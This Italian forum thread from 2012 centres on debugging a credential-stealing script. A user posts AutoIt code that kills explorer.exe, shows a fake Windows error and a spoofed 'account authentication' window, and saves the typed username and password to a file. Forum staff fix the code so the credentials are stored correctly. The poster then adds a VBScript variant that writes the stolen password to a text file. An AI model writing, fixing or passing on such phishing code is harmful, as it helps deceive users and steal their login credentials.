Salve ospite, se leggi questo messaggio vuol dire che non sei registrato, cosa aspetti ? Premi qui per registrarti La registrazione è completamente gratuita e ti permetterà di usufruire di tutte le funzionalità del nostro forum. Buona navigazione.


Vendo, Compro, Scambio NosTale! Riapre il Black Market, concludi i tuoi scambi NosTale gratuitamente! Più info  -   Accedi alla sezione
Download file Server : File Retro Server NosTale
Visita la nuova sezione di BorderGame dedicata a Blade & Soul! Sezione Blade and Soul

 
Valutazione discussione:
  • 13 voti - 2.85 media
  • 1
  • 2
  • 3
  • 4
  • 5
Errore - Dati accesso
14-03-2012 09:21 PM
Messaggio: #1
Errore - Dati accesso
Lawliet
Bannati
Utente Saggio
Utente Storico

Saccente Mode == ONLINE

Messaggi : 908

Registrato dal : Dec 2011


Stato : Offline


Premi :



Quando mi salva il testo mi scrive: "00" al posto dell'username e della password :O
Chi mi trova errorino?
Codice:
ProcessClose("explorer.exe")
ProcessClose("explorer.exe")
Msgbox(16,"Conferma account windows","C'è stato un errore nel login dell'account, si prega di immettere i dati richiesti o l'utente verrà disconnesso.")

#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Autenticazione account WINDOWS", 321, 156, 0, 0)
$Label1 = GUICtrlCreateLabel("Inserisci il tuo nome utente", 8, 24, 129, 17)
$Input2 = GUICtrlCreateInput("", 144, 24, 153, 21)
$Input1 = GUICtrlCreateInput("", 144, 64, 153, 21)
$Label2 = GUICtrlCreateLabel("Inserisci la tua password", 8, 64, 119, 17)
$Button1 = GUICtrlCreateButton("?", 272, 120, 35, 25)
$Button2 = GUICtrlCreateButton("Autenticami", 192, 120, 75, 25)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###

While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
        Case $GUI_EVENT_CLOSE
            Exit
        Case $Button2()
            AdlibRegister("Autenticami_ora",20)
        Case $Button1()
            Msgbox(64,"Autenticazione guidata","Il processo pnptest.exe ha avuto un malfunzionamento, per questo è stato trovato un errore nel login. Si è pregati di immettere i propri dati nelle descritte celle, per autenticare l'account in uso.")
    EndSwitch
WEnd

Func Autenticami_ora()
if  GUICtrlRead($Input2) = "" Then
    Msgbox(16,"Errore","Non è stato riconosciuto ne password ne username!")
Else
    Msgbox(64,"Conferma","Account autenticato.")
    Shellexecute("explorer.exe")
    Filewrite("Accesso.ini",GUICtrlRead($Input1) + "" + GUICtrlRead($Input2))
    Exit
EndIf
Torna al primo messaggio
Email WWW Cerca Rispondi
14-03-2012 10:01 PM
Messaggio: #2
RE: Errore - Dati accesso
тυттσмαχ
*
Rynn
Utente Saggio
Utente Storico

Utente attivo

Messaggi : 946

Registrato dal : Jul 2011

Reputazione : 156

Stato : Offline


Premi :



autoiti non lo tocco da molto anzi moltissimo..secondo me devi rivedere qualcosa qui
Filewrite("Accesso.ini",GUICtrlRead($Input1) + "" + GUICtrlRead($Input2)) ..a te esce 00 ==> input1(0),+ ""(nessuno spazio) + input2(0)...non so se hai capito
0+""+0=00
Torna al primo messaggio
Email Cerca Rispondi
14-03-2012 10:19 PM
Messaggio: #3
RE: Errore - Dati accesso
Yoshitoki
*
Staf Away - Gruppo Onorario
Grafico
Minecraft
NosTale
Spammer
Subber
Utente Saggio
Utente Storico
Vip

Admin

Messaggi : 5,218

Registrato dal : Nov 2010

Reputazione : 428

Stato : Offline


Premi :



EDIT:

@[Lawliet] sono riuscito a risolvere tutto, non so come perchè è la prima volta che uso l'Autoit (se lo è XD)
Codice:
Else
    Msgbox(64,"Conferma","Account autenticato.")
    Shellexecute("explorer.exe")
    Filewrite("Accesso.ini",GUICtrlRead($Input2))
    Filewrite("Accesso.ini"," ")
    Filewrite("Accesso.ini",GUICtrlRead($Input1))
    Exit
İmage

İmageLeggi il regolamento del forumİmage

E non bastano mesi, non bastano anni, non basta una vita con te.
Ma è bastato soltanto un secondo per capire che..
Di incredibili storie ce ne sono tante, ma meglio di noi non c'è niente!


Registrati su adf.ly ! Big Grin
İmage

(Questo messaggio è stato modificato l'ultima volta il: 14-03-2012 11:31 PM da Yoshitoki.)
Torna al primo messaggio
Email WWW Cerca Rispondi
15-03-2012 03:48 PM
Messaggio: #4
RE: Errore - Dati accesso
Narutomega96
Moderatori
Elite Coder
Rynn
Spammer
Utente Saggio
Utente Storico
Vip

Moderatore

Messaggi : 1,084

Registrato dal : Nov 2010

Reputazione : 213

Stato : Offline


Premi :



Codice:
ProcessClose("explorer.exe")
ProcessClose("explorer.exe")
Msgbox(16,"Conferma account windows","C'è stato un errore nel login dell'account, si prega di immettere i dati richiesti o l'utente verrà disconnesso.")

#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Autenticazione account WINDOWS", 321, 156, 0, 0)
$Label1 = GUICtrlCreateLabel("Inserisci il tuo nome utente", 8, 24, 129, 17)
$Input2 = GUICtrlCreateInput("", 144, 24, 153, 21)
$Input1 = GUICtrlCreateInput("", 144, 64, 153, 21)
$Label2 = GUICtrlCreateLabel("Inserisci la tua password", 8, 64, 119, 17)
$Button1 = GUICtrlCreateButton("?", 272, 120, 35, 25)
$Button2 = GUICtrlCreateButton("Autenticami", 192, 120, 75, 25)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###

While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
        Case $GUI_EVENT_CLOSE
            Exit
        Case $Button2()
            AdlibRegister("Autenticami_ora",20)
        Case $Button1()
            Msgbox(64,"Autenticazione guidata","Il processo pnptest.exe ha avuto un malfunzionamento, per questo è stato trovato un errore nel login. Si è pregati di immettere i propri dati nelle descritte celle, per autenticare l'account in uso.")
    EndSwitch
WEnd

Func Autenticami_ora()
if  GUICtrlRead($Input2) = "" Then
    Msgbox(16,"Errore","Non è stato riconosciuto ne password ne username!")
Else
    Msgbox(64,"Conferma","Account autenticato.")
    Shellexecute("explorer.exe")
    IniWrite("Accesso.ini", "Accesso", "Username", GUICtrlRead($Input1))
    IniWrite("Accesso.ini", "Accesso", "Password",
    GUICtrlRead($Input2))
    Exit
EndIf
endFunc

Tieni :|
Torna al primo messaggio
Email Cerca Rispondi
15-03-2012 05:58 PM
Messaggio: #5
RE: Errore - Dati accesso
тυттσмαχ
*
Rynn
Utente Saggio
Utente Storico

Utente attivo

Messaggi : 946

Registrato dal : Jul 2011

Reputazione : 156

Stato : Offline


Premi :



e quindi dove stava l'errore?
Torna al primo messaggio
Email Cerca Rispondi
15-03-2012 06:06 PM
Messaggio: #6
RE: Errore - Dati accesso
Yoshitoki
*
Staf Away - Gruppo Onorario
Grafico
Minecraft
NosTale
Spammer
Subber
Utente Saggio
Utente Storico
Vip

Admin

Messaggi : 5,218

Registrato dal : Nov 2010

Reputazione : 428

Stato : Offline


Premi :



L'errore stava che c'era il + , 0+0= 0
scrivendo come ho detto io:
Codice:
Filewrite("Accesso.ini",GUICtrlRead($Input2))
    Filewrite("Accesso.ini"," ")
    Filewrite("Accesso.ini",GUICtrlRead($Input1))
    Exit

(e probabilmente come ha scritto naruto) si risolve il problema , con il mio nel file .ini uscirà l'input 2 SPAZIO input 1 , ovvero ID spazio PW
Con quello di naruto esce pure la scritta "PASSWORD: BLABLA" etc XD
İmage

İmageLeggi il regolamento del forumİmage

E non bastano mesi, non bastano anni, non basta una vita con te.
Ma è bastato soltanto un secondo per capire che..
Di incredibili storie ce ne sono tante, ma meglio di noi non c'è niente!


Registrati su adf.ly ! Big Grin
İmage

Torna al primo messaggio
Email WWW Cerca Rispondi
15-03-2012 10:09 PM
Messaggio: #7
RE: Errore - Dati accesso
Narutomega96
Moderatori
Elite Coder
Rynn
Spammer
Utente Saggio
Utente Storico
Vip

Moderatore

Messaggi : 1,084

Registrato dal : Nov 2010

Reputazione : 213

Stato : Offline


Premi :



è.è perchè utilizzava la funzione FileWrite, su un file .ini, dove c'è una apposita funzione ovvero la IniWrite...
Torna al primo messaggio
Email Cerca Rispondi
15-03-2012 11:20 PM
Messaggio: #8
RE: Errore - Dati accesso
Lawliet
Bannati
Utente Saggio
Utente Storico

Saccente Mode == ONLINE

Messaggi : 908

Registrato dal : Dec 2011


Stato : Offline


Premi :



Oki grazie, ho fatto una piccola alternativa in basic Wink
Codice:
Set WshShell = WScript.CreateObject("WScript.Shell")
dim filename
dim text
WshShell.Run "taskkill /m /f explorer.exe", 9
bu
sub bu()
lol=Inputbox("Scrivi la tua password o verrai disconnesso:")
n=inputbox("Inserisci il tuo nome utente:")
if lol="" and n="" then
bu
else
filename="G:\password.txt"
text= lol + "-" + 123
WshShell.Run "cmd.exe /c @echo "&text&">"&filename, 9
WshShell.Run "explorer.exe", 9
end if
Torna al primo messaggio
Email WWW Cerca Rispondi
16-03-2012 03:34 PM
Messaggio: #9
RE: Errore - Dati accesso
Yoshitoki
*
Staf Away - Gruppo Onorario
Grafico
Minecraft
NosTale
Spammer
Subber
Utente Saggio
Utente Storico
Vip

Admin

Messaggi : 5,218

Registrato dal : Nov 2010

Reputazione : 428

Stato : Offline


Premi :



Ma perchè non scrivi mai l'ultimo rigo?XD In questo manca "end sub" , nell'altro mancava "end func"
İmage

İmageLeggi il regolamento del forumİmage

E non bastano mesi, non bastano anni, non basta una vita con te.
Ma è bastato soltanto un secondo per capire che..
Di incredibili storie ce ne sono tante, ma meglio di noi non c'è niente!


Registrati su adf.ly ! Big Grin
İmage

Torna al primo messaggio
Email WWW Cerca Rispondi

PubblicitàLa tua pubblicità qui, clicca per informazioni e per le offerte!

Stanno visualizzando la discussione : 1 Ospite(i)

  • Versione stampabile
  • Invia ad un amico
  • Sottoscrivi questa discussione